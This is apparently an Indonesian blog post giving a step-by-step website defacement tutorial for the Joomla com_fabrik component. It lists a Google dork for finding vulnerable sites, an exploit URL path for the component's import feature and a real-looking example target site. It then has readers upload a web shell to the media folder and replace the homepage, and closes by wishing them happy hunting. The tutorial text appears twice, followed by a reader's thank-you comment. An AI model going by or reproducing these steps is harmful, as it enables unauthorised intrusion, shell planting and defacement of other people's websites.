Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti
sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti
ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu
bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
![[Image: 3_zps5c343d96.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s1k64rnb-MlmXDnrWtEp0PxygAK_826zDiEJrd6f0ZoFy3s_1DOYXfTsrHC0IYBCZG9oc9LLK2w-rr_Ae-Vjy9uYF_guSiijoicw9suOayor37UKrfi88_2u8pj6GHfOq1xgCTesw=s0-d)
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
![[Image: 4_zps8cde2690.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQvg9iYsACo0tiy4lLrdylUdVLrCRJdfO2LVoINrkAX5BdjekwdC8b6XfFi4Cel84N7kHJ8JHYd4HTLC8EJjngtR-UcexqQ2h-9kzATVWwt_p0XKoiz1rtN2_2ABXDE3B-OhAilw=s0-d)
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
![[Image: 5_zpsfe8fbe56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uB48-WkGwCjIg_4cQIRimiJBkeMZ9-q3g3iTS8wrUgS8vKfclR6OXqwpDuhjqvbQM9T_mf-M1kuvqEaabS36Z_U6QaANFM9LDe3m6RAjjqCSj_v1z9176jr4X_-qVOev2OMLvdK4I=s0-d)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
1 comments:
Tulis commentsthx ya atas informasi.a
Reply